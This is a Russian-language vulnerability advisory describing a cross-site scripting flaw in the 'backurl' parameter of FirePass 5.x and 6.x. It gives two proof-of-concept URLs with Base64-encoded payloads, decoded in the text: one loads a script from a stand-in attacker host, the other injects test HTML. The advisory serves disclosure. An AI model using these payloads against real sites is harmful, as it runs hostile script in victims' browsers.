Программа:
FirePass 5.x
FirePass 6.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "backurl" сценарием download_plugin.php3. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.

Примеры:

https://target.tld/download_plugin.php3? js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c
3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==

Полезная нагрузка кодирована в Base64. В данном примере это:

"><script src="http://www.evil.foo/xss"></script><a href="

которая вызывает злонамеренный JavaScript код из стороннего URL ('http://www.evil.foo/xss'
в данном случае), чем доказывается, что скрипт может быть запущен без
ограничений длины или вставки символов.

https://target.tld/download_plugin.php3? js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gd
GVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i

Полезная нагрузка кодирована в Base64. В данном примере это:

"><textarea>HTML injection test</textarea><a href="

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии